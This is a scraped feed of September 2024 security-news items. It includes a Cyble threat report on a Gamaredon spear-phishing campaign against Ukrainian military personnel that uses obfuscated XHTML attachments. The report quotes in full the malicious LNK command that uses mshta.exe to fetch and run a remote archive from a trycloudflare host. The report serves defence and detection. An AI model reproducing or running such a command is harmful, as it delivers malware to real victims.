important for blocking known malicious domains, including those abused by groups like Gamaredon. Staying updated with the latest threat intelligence provides an edge in preemptively countering cyberattacks. The Gamaredon campaign represents a significant escalation in cyber threats targeting Ukrainian military personnel. Through the use of spear-phishing emails, malicious XHTML attachments, and advanced evasion techniques like TryCloudflare’s one-time tunnel feature, Gamaredon continues to refine and intensify its attacks. The persistence and scale of this campaign highlight the importance of maintaining vigilant and proactive cybersecurity measures.
by The Cyber Express
2024-09-06 11:04:28
Atomic macOS Stealer leads sensitive data theft on macOSSophos X-Ops explores the distribution and capabilities of the Atomic macOS Stealer (AMOS)
by Sophos News
2024-09-06 11:00:19
1Password review: A premium password manager well worth the moneyUpgrade your security with 1Password, a premium password manager with useful features.
by ZDNET Security
2024-09-06 11:00:00
PowerShell Speech Recognition: How To Set up Voice Commands and ResponsesLearn how to create a PowerShell script that can listen to your voice and respond with spoken words.
by ITPro Today
2024-09-06 10:53:59
Key cyber insurance stakeholders urge government to help close $900B in uncovered riskMarsh McLennan and Zurich Insurance Group issued a white paper urging a public-private partnership to help tackle a growing coverage gap. The White House is working on a plan.
by Cybersecurity Dive
2024-09-06 10:52:12
Veeam Patches Critical Vulnerabilities in Enterprise ProductsVeeam has released patches for critical-severity vulnerabilities in Backup & Replication, ONE, and Service Provider Console. The post Veeam Patches Critical Vulnerabilities in Enterprise Products appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 10:52:00
Apache OFBiz Update Fixes High-Severity Flaw Leading to Remote Code ExecutionA new security flaw has been addressed in the Apache OFBiz open-source enterprise resource planning (ERP) system that, if successfully exploited, could lead to unauthenticated remote code execution on Linux and Windows. The high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5), affects all versions of the software before 18.12.16. ""An attacker with no valid
by The Hacker News
2024-09-06 10:45:00
Therapy Sessions Exposed by Mental Health Care Firm’s Unsecured DatabaseVideo and audio of therapy sessions, transcripts, and other patient records were accidentally exposed in a publicly accessible database operated by the virtual medical company Confidant Health.
by WIRED Security News
2024-09-06 10:12:22
LiteSpeed Cache Plugin Vulnerability Exposes Millions of WordPress Sites to AttacksA vulnerability in the LiteSpeed Cache WordPress plugin leads to the exposure of sensitive information, including user cookies. The post LiteSpeed Cache Plugin Vulnerability Exposes Millions of WordPress Sites to Attacks appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 10:01:42
Critical RCE Vulnerability Patched in Apache OFBiz (CVE-2024-45195)Popular open-source enterprise Resource Planning (ERP) system, Apache OFBiz, recently discovered harboring a critical Remote Code Execution (RCE) vulnerability. Tracked as CVE-2024-45195, the Apache OFBiz vulnerability could allow attackers to execute arbitrary code on vulnerable Linux and Windows servers running OFBiz. Thankfully, the Apache security team has addressed the issue in the latest update, urging users to patch their installations immediately. Understanding the Apache OfBiz RCE Vulnerability (CVE-2024-45195) The vulnerability, discovered by Rapid7 security researchers, stems from missing authorization checks within the OFBizEweb application. This weakness, categorized as a forced browsing vulnerability, exposes restricted paths to unauthenticated direct request attacks. ""An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server,"" 1 explained security researcher Ryan Emmons in a report. In simpler terms, an attacker could potentially exploit this vulnerability by crafting a specially designed URL that bypasses authentication protocols. If successful, this could grant the attacker the ability to execute malicious code on the server, potentially leading to complete system compromise. Potential Consequences of the Exploit The consequences of exploiting CVE-2024-45195 could be severe for organizations relying on OFBiz. Here are some potential risks: Data Theft and Leakage: Attackers could gain access to sensitive information stored on the server, including customer data, financial records, and intellectual property. Disruption of Operations: The execution of malicious code could disrupt critical business processes, leading to downtime and financial losses. Lateral Movement and Persistence: Exploiting this vulnerability could be a stepping stone for attackers to gain a foothold in the network and launch further attacks within the system. Apache Patches Flaw The Apache Software Foundation (ASF) has released a patch (version 18.12.16) that addresses CVE-2024-45195. This update strengthens the authorization checks within the OFBiz application, preventing unauthorized access to restricted paths. Emmons explained that CVE-2024-45195 patch is a bypass for three other OFBiz vulnerabilities that have been addressed in the past few months and are tracked as CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856. CVE-2024-32113 had been exploited in attacks using the Mirai botnet, highlighting the serious risks associated with such flaws. Meanwhile, CVE-2024-38856 was rated with a CVSS score of 9.8 by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) , classifying it as critical in severity. The vulnerability allowed attackers to execute remote code without prior authentication, posing a severe risk to affected systems. Based on our analysis, three of these vulnerabilities are, essentially, the same vulnerability with the same root cause,"" Emmons said. All of them are caused by a controller-view map fragmentation issue that enables attackers to execute code or SQL queries and achieve remote code execution sans authentication. The latest patch put in place ""validates that a view should permit anonymous access if a user is unauthenticated, rather than performing authorization checks purely based on the target controller."" Importance of Security in Open-Source Software The discovery of CVE-2024-45195 serves as a reminder of the importance of security in open-source software. While open-source tools offer numerous benefits, they also require consistent vigilance and patching to address vulnerabilities promptly. Users are responsible for keeping their deployments up-to-date and implementing additional security measures to mitigate risks. The patching of CVE-2024-45195 is a positive step forward, but it''s vital to remain vigilant. The ever-evolving cyber threat landscape necessitates continuous monitoring and proactive security measures. By implementing a comprehensive security strategy, organizations using OFBiz can minimize their attack surface and safeguard their critical data.
by The Cyber Express
2024-09-06 10:01:31
Apache OFBiz team patches critical RCE vulnerability (CVE-2024-45195)For the fourth time in the last five months, Apache OFBiz users have been advised to upgrade their installations to fix a critical flaw (CVE-2024-45195) that could lead to unauthenticated remote code execution. About CVE-2024-45195 Apache OFBiz is an open-source suite for enterprise resource planning (ERP), which contains web applications for human resources management, customer relationship management, accounting, marketing, etc. “Apache OFBiz is used by numerous large organizations, and previously disclosed vulnerabilities for it have … More → The post Apache OFBiz team patches critical RCE vulnerability (CVE-2024-45195) appeared first on Help Net Security.
by Help Net Security
2024-09-06 10:00:02
Vulnerability in Tencent WeChat custom browser could lead to remote code executionWhile this issue was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported it to the vendor.
by Cisco Talos Blog
2024-09-06 09:48:02
Unlock Business Value Through Effective DevOps Infrastructure ManagementEffective DevOps infrastructure management is key to accelerating development cycles, enhancing collaboration, and maintaining security while aligning with organizational goals and customer needs.
by ITPro Today
2024-09-06 09:45:10
New cyber hiring sprint aims to address workforce gapOngoing gaps in the U.S. cybersecurity workforce that have left nearly half a million jobs unfilled have prompted the Office of the National Cyber Director to introduce the new Service for America cyber hiring sprint that would link jobseekers to cyber jobs within the next two months.
by SC Media
2024-09-06 09:43:46
CISA Breaks Silence on Controversial ‘Airport Security Bypass’ VulnerabilityResearchers and the TSA have different views on the impact of vulnerabilities in an airport security application that could allegedly allow the bypass of certain airport security systems. The post CISA Breaks Silence on Controversial ‘Airport Security Bypass’ Vulnerability appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 09:34:58
Zero-trust adoption almost completed by most federal agenciesZero-trust implementation has been 87% completed across federal agencies on average ahead of the September 30 deadline.
by SC Media
2024-09-06 09:32:00
Critical Apache OFBiz flaw patchedSuch a vulnerability evades fixes issued for previous OFBiz bugs, tracked as CVE-2024-38856, CVE-2024-36104, and CVE-2024-32113, all of which have resulted from a fragmentation issue within the controller-view map that could allow unauthenticated remote code or SQL query execution, according to Rapid7 security researchers.
by SC Media
2024-09-06 09:32:00
Pavel Durov Criticizes Outdated Laws After Arrest Over Telegram Criminal ActivityTelegram CEO Pavel Durov has broken his silence nearly two weeks after his arrest in France, stating the charges are misguided. ""If a country is unhappy with an internet service, the established practice is to start a legal action against the service itself,"" Durov said in a 600-word statement on his Telegram account. ""Using laws from the pre-smartphone era to charge a CEO with crimes committed
by The Hacker News
2024-09-06 09:26:21
Widespread WordPress site takeovers likely with critical LiteSpeed Cache bugExploitation of the flaw, which stems from LiteSpeed Cache''s debug logging functionality, could be conducted by attackers with ''/wp-content/debug.log'' file access to exfiltrate users'' session cookies, spoof admin users, and takeover websites.
by SC Media
2024-09-06 09:25:35
Misconfigured Elasticsearch database exposes 762K Chinese car ownersIndividuals'' full names, birthdates, phone numbers, ID numbers, email addresses, home addresses, vehicle identification numbers, car brands and models, engine numbers, and vehicle colors were leaked by the unsecured Elasticsearch instance.
by SC Media
2024-09-06 09:24:53
Multiple Cisco product vulnerabilities addressedThreat actors could leverage CVE-2024-20439 via static credentials to facilitate the compromise of targeted systems with administrative privileges while intrusions involving CVE-2024-20440 could enable the acquisition of log files with credentials and other sensitive details.
by SC Media
2024-09-06 09:20:11
SonicWall SSLVPN access control flaw is now exploited in attacksSonicWall is warning that a recently fixed access control flaw tracked as CVE-2024-40766 in SonicOS is now ""potentially"" exploited in attacks, urging admins to apply patches as soon as possible. [...]
by BleepingComputer
2024-09-06 09:18:00
Penpie loses over $27M from crypto heistImmediate withdrawal and deposit takedowns, as well as notifications to the FBI''s Internet Crime Complaint Center and the Singaporean police have been conducted by Penpie following the theft on Tuesday.
by SC Media
2024-09-06 09:16:00
Is this a major breakthrough in quantum security?We’re focused on… Developments in quantum cryptography. Why? Because a breakthrough by scientists at Oxford University Physics, announced in April 2024, has taken us a step closer to the possibility of individuals and companies leveraging the power of quantum computing – by guaranteeing privacy and security. The breakthrough was laid out in a study, published in the journal Physical Review Letters. One of the lead researchers, Professor David Lucas, said in a statement: “Never in history have the issues surrounding privacy of data and code been more urgently debated than in the present era of cloud computing and artificial intelligence. As quantum computers become more capable, people will seek to use them with complete security and privacy over networks, and our new results mark a step change in capability in this respect.” Where does the urgency behind quantum security come from? When we interviewed cryptography expert Ahmad Almorabea (Senior Penetration Testing Consultant at TCC), we asked if he thinks there’s a risk that industries and governments will be too slow to implement quantum-safe cryptography before quantum computing technology becomes more accessible on open markets. “Yes, there’s a risk,” he said. “Quantum computing’s advancement could potentially break current encryption methods.” “If industries/governments don’t act swiftly to adopt quantum-safe cryptography, sensitive data could be vulnerable in the future. And there are many aspects in cryptography that could be broken, while Quantum computing advances (i.e. key derivation, encryption algorithms, PKI and more).” Speaking on the developments in quantum cryptography that he was particularly optimistic about, Almorabea added: “I believe cryptographic algorithms will be able to search in encrypted texts without the need for understanding the actual texts available. And it’s a big step towards having our privacy back. “I’m excited about the improvement happening in cryptographic algorithms using AI. In scenarios where learning models need to be applied on sensitive data, AI cryptography plays a vital role in preserving privacy. What does the new Oxford University Physics research show? Right now, quantum computing has to operate within highly controlled conditions in order to remain stable – and there are growing concerns about how quickly quantum computing could break existing security and encryption systems. The new study shows that quantum computing in the cloud can be accessed in a way that’s both scalable and practical, and that gives users complete data privacy and security – along with the ability to verify the authenticity of data. They used an approach called ‘blind quantum computing’, which connects two completely separate quantum computing entities (which could, for example, be a person at home accessing a cloud server) in a secure way. Using a combination of quantum memory and photos, researchers developed a system made up of a fibre network link between a server and a device detecting photons, at an independent computer that remotely accesses its cloud services. Study co-lead Dr Peter Drmota said: “Using blind quantum computing, clients can access remote quantum computers to process confidential data with secret algorithms and even verify the results are correct, without revealing any useful information. Realising this concept is a big step forward in both quantum computing and keeping our information safe online.” Ultimately, this could enable commercial development of quantum-enabled devices. Through blind quantum computing, secure devices that safeguard data when users access cloud quantum computing services could be scalable for commercial markets. P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!
by HACKLIDO
2024-09-06 09:00:00
Cybersecurity Snapshot: RansomHub Group Triggers CISA Warning, While FBI Says North Korean Hackers Are Targeting Crypto OrgsCybersecurity teams must beware of RansomHub, a surging RaaS gang. Plus, North Korea has unleashed sophisticated social-engineering schemes against crypto employees. Meanwhile, a new SANS report stresses the importance of protecting ICS and OT systems. And a Tenable poll sheds light on cloud-native VM. And much more!Dive into six things that are top of mind for the week ending September 6.1 - CISA: Keep RansomHub RaaS gang on your radar screenRansomHub, a relatively new ransomware group, has become a serious threat as its successful ransomware-as-a-service (RaaS) model increasingly lures prominent affiliates away from competitors like LockBit.That’s the warning from CISA, which urges cyber teams to protect their organizations by keeping software updated, adopting phishing-resistant multi-factor authentication and training employees to recognize phishing attacks.In an advisory titled “#StopRansomware: RansomHub Ransomware,” CISA details the RaaS gang’s tactics, techniques and procedures, as well as its indicators of compromise, and offers mitigation recommendations. RansomHub and its affiliates have successfully attacked at least 210 organizations from a wide variety of industries, including from multiple critical infrastructure sectors.Highlights from the advisory include:RansomHub affiliates use double extortion, meaning they encrypt victims’ systems and exfiltrate their data.Preferred initial-access targets include internet-exposed systems and endpoints, while its go-to attack methods are phishing emails, known-vulnerability exploitation and password spraying.These known vulnerabilities have been exploited: CVE-2023-3519, CVE-2023-27997, CVE-2023-46604, CVE-2023-22515, CVE-2023-46747, CVE-2023-48788, CVE-2017-0144, CVE-2020-1472 and CVE-2020-0787.Recommended mitigation measures include:Adopt a recovery plan for storing critical data in locations that are physically separate, segmented and secure. Back up data offline and encrypt it.Enforce strong-password requirements.Maintain all operating systems, software and firmware updated.Protect administrator accounts with phishing-resistant MFA, least-privilege principles and time-based access, like the just-in-time access method.Segment networks and monitor them for unusual and suspicious activity.Check for unrecognized accounts in domain controllers, servers, workstations and directories.Previously known as Cyclops and Knight, RansomHub was launched in February of this year and ranked as the most active ransomware group in July with 11% of all attacks, according to NCC Group.The FBI, the Multi-State Information Sharing and Analysis Center (MS-ISAC) and the Department of Health and Human Services (HHS) partnered with CISA on this advisory.For more information about ransomware trends and security best practices:“Ransomware Is ‘More Brutal’ Than Ever in 2024” (Wired)“How Can I Protect Against Ransomware?” (CISA)“How to prevent ransomware in 6 steps” (TechTarget)“Steps to Help Prevent & Limit the Impact of Ransomware” (Center for Internet Security)“Ransomware: How to prevent and recover” (Canadian Centre for Cyber Security)2 - FBI: North Korean hackers go after crypto playersUsing intricate, persistent and stealthy social-engineering schemes, North Korea’s government is targeting staffers at crypto organizations to steal cryptocurrency by breaching their networks using malware.Specifically, hackers acting on behalf of North Korea’s government have their sights set on organizations that offer cryptocurrency exchange-traded funds (ETFs) and other crypto-based financial products.That’s according to the FBI, which this week issued an alert for companies in the cryptocurrency sector titled “North Korea Aggressively Targeting Crypto Industry with Well-Disguised Social Engineering Attacks.”“North Korea employs sophisticated tactics to steal cryptocurrency funds and is a persistent threat to organizations with access to large quantities of cryptocurrency-related assets or products,” reads the FBI alert. Tactics employed by these North Korean hackers include:Conducting thorough and detailed research on employees of the crypto organizations they intend to targetCreating elaborate fake offers such as employment and investment opportunities that are tailored for each targeted individualInteracting extensively one-on-one with the victims, often impersonating real people, such as recruitersRequesting to:Execute code or download apps on company-owned devicesConduct “pre-employment” technical tests or exercises involving the execution of packages and scriptsRun a script in order to enable voice calls or video meetings Among the FBI’s recommended mitigations are:Develop methods to verify a contact’s identity.Don’t keep crypto-wallet information, such as logins and passwords, in devices connected to the internet.Decline to take pre-employment tests or to execute code on company-owned devices.Conduct multiple authentication checks and require approvals from unconnected networks before carrying out financial transactions.For more information about crypto hacking trends:“Crypto hacking thefts double to $1.4 bln in first half of 2024” (Reuters)“Can Crypto Be Hacked?” (Investopedia)“2024 Crypto Crime Mid-year Update Part 1 and Part 2” (Chainalysis)“The 6 biggest crypto heists of all time” (Quartz)“Indian crypto platform WazirX confirms $230 million stolen during cyberattack” (The Record)3 - Tenable surveys webinar attendees on cloud-native VMDuring our recent webinar “A Cyber Pro''s Guide to Cloud-Native Vulnerability Management,” we polled attendees about issues related to cloud VM and cloud-native technologies. See what they said about their cloud-native application challenges and cloud VM strategies!(62 webinar attendees polled by Tenable, August 2024)(49 webinar attendees polled by Tenable, August 2024)Want to learn more about the benefits of agentless cloud security and about extending your VM strategy to the cloud? Watch the on-demand webinar “A Cyber Pro''s Guide to Cloud-Native Vulnerability Management” today.4 - SANS: Businesses can’t ignore security of ICS and OTLooking for insights and best practices to boost the cybersecurity of your industrial control systems (ICS) and operational technology systems (OT)? You might want to check out SANS Institute’s new guide ""ICS Is the Business: Why Securing ICS/OT Environments Is Business-Critical in 2024.""The guide stresses that protecting ICS and OT systems is essential for business success and that to secure ICS and OT systems you can’t use the same strategy, processes and tools you employ to protect the IT environment.“The steps outlined here are essential for ensuring that our industrial systems continue to operate safely and reliably,” author Dean Parsons, a SANS Certified Instructor, said in a statement. Topics covered in the paper include:An overview of the top threats impacting ICS and OT systems, including targeted, tailored strikes against these environments; ransomware attacks; supply chain breaches; and attacks that originate in the IT network.The differences between IT and ICS/OT environments, and why they require a different security approach.Five critical cybersecurity controls for ICS/OT:ICS-specific incident responseNetwork architecture that supports defensible controls, like segmentation and log collectionICS network visibility and monitoringICS secure remote accessRisk-based ICS vulnerability managementHow to use AI to bolster ICS/OT security.The ways in which CISOs can advance their organizations’ ICS/OT security maturity.For more information about OT security, check out these Tenable resources:“Unlock Advanced IoT Visibility in your OT Environment Security” (on-demand webinar)“How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform” (blog)“Securing The Manufacturing Shop Floor” (white paper)“Fortifying Your OT Environment: Vulnerability and Risk Mitigation Strategies” (on-demand webinar)“CISA Finding: 90% of Initial Access to Critical Infrastructure Is Gained Via Identity Compromise. What Can You Do About It?” (blog)5 - Cybersecurity among top techs getting an AI boostCybersecurity ranks high among the technologies into which organizations are integrating AI in order to beef up their tech stacks’ capabilities and improve IT productivity.That’s according to CompTIA’s “Building AI Strategy” report, based on a survey of 511 tech and business pros in North America.When respondents were asked which of their tech initiatives are incorporating AI, cybersecurity came in third, mentioned by 61%, behind automation (67%) and data analysis (63%). “In these (three) cases, AI can understand a wide variety of inputs related to the problem at hand, then provide various forms of assistance, such as direct automation of certain tasks, suggestions of patterns found in data, or predictions of cyber attacks,” the report reads. Cybersecurity also made the list of respondents’ main concerns related to their use of AI in technology, ranking third. The top concern was finding the right interaction balance between AI tools and employees, followed by infrastructure costs for AI.For more information about the intersection of AI and cybersecurity, check out these Tenable blogs:“How to Discover, Analyze and Respond to Threats Faster with Generative AI”“Securing the AI Attack Surface: Separating the Unknown from the Well Understood”“Never Trust User Inputs -- And AI Isn''t an Exception: A Security-First Approach”“Do You Think You Have No AI Exposures? Think Again”“AI Is About To Take Cybersecurity By Storm: Here''s What You Can Expect”6 - U.S. government wants to boost security of internet routingThe technology that underpins the internet’s traffic routing is insecure – a dangerous weak link that cyberattackers are increasingly targeting and that represents a global cyber risk.So said the White House, which is urging a variety of players, including government agencies, internet service providers, academia, mobile operators and cloud providers, to help address the problem.The report “Roadmap To Enhancing Internet Routing Security” by the Office of the National Cyber Director was released this week and aims to foster the adoption of technologies that can make the ubiquitous Border Gateway Protocol (BGP) more secure.“As initially designed and commonly operating today, BGP does not provide adequate security and resilience features for the risks we currently face,” the report reads. For example, BGP is unable to determine if messages exchanged between neighboring networks are authentic, nor can it verify that information from remote networks is legit. Over the past two decades, BGP’s design vulnerabilities have led to serious misconfiguration accidents, and opened the door for a variety of cyberattacks.The good news is that initial techniques to boost BGP’s security and resilience have been introduced and standardized, and are being deployed, specifically security mechanisms based on Resource Public Key Infrastructure (RPKI), according to the document.“This roadmap provides recommendations and guidance necessary to increase the adoption of these initial BGP security technologies across all network operators in the Internet ecosystem,” the report reads.
by Tenable
2024-09-06 08:41:55
Spear-Phishing in the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s MilitaryKey Takeaways Cyble Research and Intelligence Labs (CRIL) identified an active Gamaredon campaign targeting Ukrainian military personnel through spear-phishing emails. The emails include malicious XHTML attachments, which, when opened, execute obfuscated JavaScript code that downloads a malicious archive to the victim’s system. This archive contains a Windows shortcut (LNK) file that, when triggered, initiates the execution of a remote .tar archive hosted on TryCloudflare[.]com via mshta.exe. The Threat Actors (TAs) leverage TryCloudflare’s one-time tunnel feature to anonymously host malicious files and access resources remotely without detection. The campaign appears to be large-scale and coordinated, as indicated by the widespread distribution of similar files, and it remains ongoing based on the volume and timing of discovered samples. The inclusion of a 1-pixel remote image suggests the TAs are tracking victim interactions with the malicious files, likely to monitor the campaign''s effectiveness. Executive Summary As the Russia-Ukraine conflict continues to evolve, we remain vigilant in monitoring emerging threats. Previously, we tracked the activities of UNC1151, which targeted Ukraine’s Ministry of Defence with a malicious Excel document designed to compromise sensitive systems. Additionally, we observed UAC-0184’s malware campaign, which deployed the XWORM RAT against Ukrainian targets, utilizing Python to facilitate DLL sideloading techniques for further infiltration. During our investigation, we came across an ongoing campaign of Gamaredon targeting Ukraine. Gamaredon, also known as Primitive Bear or Armageddon, is a Russian-linked Advanced Persistent Threat (APT) group that has been active since at least 2013. It is known for its cyber-espionage activities, primarily targeting Ukrainian government institutions, military, and other critical infrastructure sectors. Gamaredon has been involved in numerous high-profile campaigns, particularly during periods of heightened tension between Russia and Ukraine. Although its operations have been characterized by the use of relatively low-sophistication tools, its success is attributed to its persistence and focus on specific geopolitical targets. In recent months, Gamaredon has intensified its efforts with a large-scale phishing campaign aimed at Ukrainian entities. This campaign involves sophisticated tactics and widespread phishing attempts, reflecting the ongoing and escalating nature of cyber threats amidst the conflict. The figure below shows the Gamaredon sample observed since the start of August 2024. Figure 1 - Gamaredon Sample Observed in the Wild Amid the ongoing Russia-Ukraine conflict, Cyble Research and Intelligence Labs (CRIL) encountered a spear-phishing campaign targeting Ukrainian military personnel. The malicious email contains an XHTML attachment that, upon opening, executes several malicious activities on the infected system. After thorough analysis, our research points to the Gamaredon APT group as the orchestrator of this attack. Technical Details The campaign begins with a spear-phishing email bearing the subject ""ПОВІСТКА,"" which translates to ""summons."" The email is themed around a military summons directed at the recipient and includes a malicious XHTML attachment, as shown in the figure below. Figure 1 - Gamaredon Sample Observed in the Wild Upon opening the XHTML file, the user is presented with a message in Ukrainian stating, ""File uploaded to the ''DOWNLOADS'' folder."" Simultaneously, a RAR compressed folder is silently dropped into the system''s Downloads directory. This action is designed to mislead the victim, making it appear as though a legitimate file has been downloaded. The figure below shows the XHTML message. Figure 3 - XHTML file The XHTML file contains obfuscated JavaScript code that executes upon the user opening the file. In the XHTML, the JavaScript is embedded within a `div` element, with the `div id` set to “jwu.” This obfuscated script consists of a Base64-encoded string mixed with a “*” character at random places to evade detection. The JavaScript execution is triggered via the ""onerror"" event. In some variants, it is activated through the ""onmousemove"" event, ensuring the malicious code runs as soon as the user interacts with the file. The figure below shows the obfuscated XHTML code. Figure 4 - XHTML Code The de-obfuscated string within the “jwu” `div` reveals JavaScript code that contains a Base64-encoded 7zip compressed archive disguised with a .rar file extension. This script decodes the Base64 data and saves the 7zip archive to the Downloads folder as “5-2839-2024_29.08.2024.rar.” Additionally, the script retrieves a 1-pixel remote image, likely serving as a tracking mechanism to monitor the execution and interaction with the malicious file. The figure below shows the de-obfuscated JavaScript. Figure 5 - Deobfuscated JavaScript The RAR file contains a Windows shortcut (LNK) file. Upon execution, the malicious LNK file triggers the execution of the remote .tar file via mshta.exe. In this campaign, the TAs leveraged the domain trycloudflare[.]com to host the malicious tar archives. By exploiting the TryCloudflare service, TAs can establish a one-time tunnel without the need for an account with Cloudflare. This tunnel enables remote access to resources and data outside the local network, functioning similarly to a VPN or secure shell (SSH) protocol, allowing the attackers to evade traditional detection mechanisms. The Target command of the LNK file is mentioned below. “C:\Windows\System32\mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f” The figure below shows the property of the LNK file. Figure 6 - Property of LNK File We were unable to obtain the .tar files in our research. However, according to an analysis by Cisco Talos, Gamaredon is known for downloading additional malicious files designed to steal sensitive information from the victim''s system. Conclusion The ongoing Gamaredon APT campaign demonstrates the group''s persistence and evolving tactics in targeting Ukrainian military personnel. By leveraging spear-phishing emails, malicious XHTML attachments, and obfuscated JavaScript, the attackers deliver harmful payloads while exploiting TryCloudflare’s one-time tunnel feature to host malicious archives. The campaign’s scale and frequency indicate a coordinated, mass phishing effort aimed at sensitive Ukrainian entities. Recommendations The following are the recommendations to Mitigate the Gamaredon APT Campaign. Train users to recognize spear-phishing attempts, especially those with suspicious attachments or unexpected military-themed content. Implement email security solutions with advanced threat protection, filtering phishing emails and malicious attachments. Deploy anti-malware solutions capable of detecting and blocking obfuscated JavaScript and malicious LNK files. Monitor for unusual network activity, including connections to TryCloudflare tunnels and other unknown external resources. Use application whitelisting to allow only trusted applications and scripts to run. Leverage threat intelligence platforms to block known malicious domains, including those abusing TryCloudflare. MITRE ATT&CK® Techniques Tactic Technique Procedure Initial Access (TA0001) Phishing: Spearphishing Attachment (T1566.001 ) Gamaredon sends spear-phishing emails with malicious XHTML attachments targeting Ukrainian military personnel. Execution (TA0002) User Execution: Malicious File (T1204.002) The campaign relies on users opening the XHTML attachment, which then triggers JavaScript code execution. Execution (TA0002) Signed Binary Proxy Execution: Mshta (T1053.005) mshta.exe is used to execute a remote .tar archive file hosted on a compromised cloud service. Defence Evasion (TA0005) Obfuscated Files or Information (T1027) The campaign uses obfuscated JavaScript hidden in the XHTML file, including random “*” characters in Base64 encoded strings to avoid detection. Indicators Of Compromise Indicator Indicator Type Description 0c823adb18cf2583222e6fbe73c08cac8147d20b02fbe88d51cac2a1c628a30b SHA256 XHTML 12bac5853724722330ce7f6b782db13844f8343ccc851fa2db1e93b980a6cf49 SHA256 XHTML a4806713db9cf41ab503e046981b8c5e1a9928314bb32545bd104fab2c36b332 SHA256 XHTML 0fd6e081172d8576ad2f16ab6360a0086442560aa24ab1f4636a592f279c19ef SHA256 XHTML 66de05ae4f4f185a514ad11daac0b7f944748ffa6885a7d7a826def45d305cfe SHA256 XHTML 1a6ce74fc1487537936d769243f39b265fd3911e72e7caacaa793f1fffe52296 SHA256 XHTML e6d342fde640e5d5d9ef2f470d0f23ed660d7f19cc33470ec40a9f8e9b9c1561 SHA256 XHTML 17f66f2b3e2f9ba8c8f739876f99e2d7abc81b264f3015d3de86267f007cc49b SHA256 XHTML 10cecb7a032325024b9ba7a0ea5f1a910268078317ca4ca7dae9e06779837631 SHA256 XHTML 83d4b0aea975acb7f80417748f179d8ef9ecbba9150b24e3354ef92e17ccf242 SHA256 XHTML 201ad0967246bb0a5b3f7aa85f31395e750c0237959d86b9c2d9dbf5fbb951c4 SHA256 XHTML d4df2899a4569f7cb9ac5edce6b4eef8eba3031b7f96f74552734362afea18b7 SHA256 XHTML 95beb4bd1a94c8db58dddeb926f656003e1dca2c66d04870380445b23840b536 SHA256 XHTML 13f065a592246074d7d929dd4f977d247a69efa9e1dbbe3613f81d3d8f39d6f4 SHA256 XHTML a1d689a0839a143e371242fb217db82e0cbdfeff4daa49e6ffe5c5b3375fae3d SHA256 XHTML 4b1d8e58c866a8b12e8987559287592ee54a482328e8c03d5666a761bcf10f92 SHA256 XHTML db63ca233296a239e4b8d7f28b2db776596bcb645d3958bc4b3447074d7635b9 SHA256 XHTML 2da9941aae860aaa2d3bb7208c900549464955733457f529014d945a24737e79 SHA256 XHTML 2636907826c9bc27ee4c7519979c0add5ad981e71edf7eb53002b8ab89fc8142 SHA256 XHTML e18955f5a9fb6abb30fd5dcbc840d34cce9bb1c70552cc36941139fc6e7304b5 SHA256 XHTML 0ae813d5ea1c0114795174a48b57a90c0f719485e3c733bbd5403c77dab29298 SHA256 XHTML 71e02cfc2c871768b8ae5ad9af9e9cb664e0a66be3f3c8d050b6d58f3cd4c07a SHA256 XHTML ad2c0c8d14d782610ed7173a5d0b4bd13524ceb1027d070a1cda312cfd60983a SHA256 XHTML 1cbd7696840ec6a3442a8bf4f7deb545bbeeee68fb27e4352197953af976cf2a SHA256 XHTML 0a4bcecdee823cc3c2d4ae2d5569edca7bc8372f5d37f62083782e92732a63c8 SHA256 XHTML afa7a8bb0cb0508f579b936488bbfff0142d458c26ef98904cb06e98f6b50f81 SHA256 XHTML 265042be55ec0082a500a24cdb5da8b289c42116e23eddcfc80dfd24019f6412 SHA256 XHTML 1b3db58482ad147faeda64eced7648bee08bfc78194e3f7bcb52cf1860d07a04 SHA256 XHTML 821ee2a91cca1e17f890e099ee41a47cc5943149a10e81467e57803d6d5b02de SHA256 XHTML 0e1eb8a5f850bc7712f78adcfe6c7c29215ea620ad2c36a0795016f0299d6ea4 SHA256 XHTML f9662c14db97db311d71b00ce33a41bbc4bc4ab6f05d8ccd99562e773d8948b1 SHA256 XHTML c7802521935c6dc3dc81e15ac952b9782ca1743dcd9e4e11030f0957d8f2a156 SHA256 XHTML 56188e68f6f6bba34f6771056859f1a7232edef264fbe67e0c8b30c1ca569259 SHA256 XHTML a620f9af481001e2d96a2d210f086fa144731a1b95db32addcd148e09a627374 SHA256 XHTML df124b73f309e634ca7c226c5e1ae2545f45907a88a40249c8ac1d5e40eca43f SHA256 XHTML f94817a02884f73f9ed462c67581cda4fc169568f7636f01237a25da3df93d7c SHA256 XHTML 5f7173cd548b227206e70419739a2f6ca4087ef693297b9b67a29fbcb4d1e928 SHA256 XHTML f59715593679ff13e92e14f8f98c6ead1cbe678f3a5ac28de8085c1a7132b02c SHA256 XHTML 58d6c125ccab32414f63ba62cc7ba4a2500a0d2890506069ba7e0ac166799491 SHA256 XHTML 51427e20fc02cb04948c2ab53378beb52727a6a84570f880aeaebd6be27f1dad SHA256 XHTML bbc97c086436385c32b0ac5f6cf35e7446f0e12e0412ed090e7099b873837795 SHA256 XHTML a7d060ea2dfd98f723aff909e5c88c3d8d3d54d96e5f6e7a09aad1de8d8ef10b SHA256 XHTML cba52f16695dc3d80a98c560a7614a3f91aaea242344b423b260d06362a2c9e0 SHA256 XHTML ab333d21c0fa8fe5b6cd620736fb04d7af53a6a0be604066617a1374fa7baa78 SHA256 XHTML a4b912413e39b4307613c8941af258750782e77d820c172155dfaaee6b32d2db SHA256 XHTML c863155cf6a39a376eef232737ba2922e324d8b05de36ddebe4068060b09a498 SHA256 XHTML bee43c5f1a714fdef911e5dc99fe27854f5db00de859dddc09e720eb56e1c53e SHA256 XHTML ca7a5daf2528233dae5c38d929a07ef30d5ca7d349df2ce842d795311f22fa2f SHA256 XHTML 770223d8c0c7d5abd4d6c0215cf9479f7a0e32a1dfaaa3b42c71dfe26ccb986f SHA256 XHTML 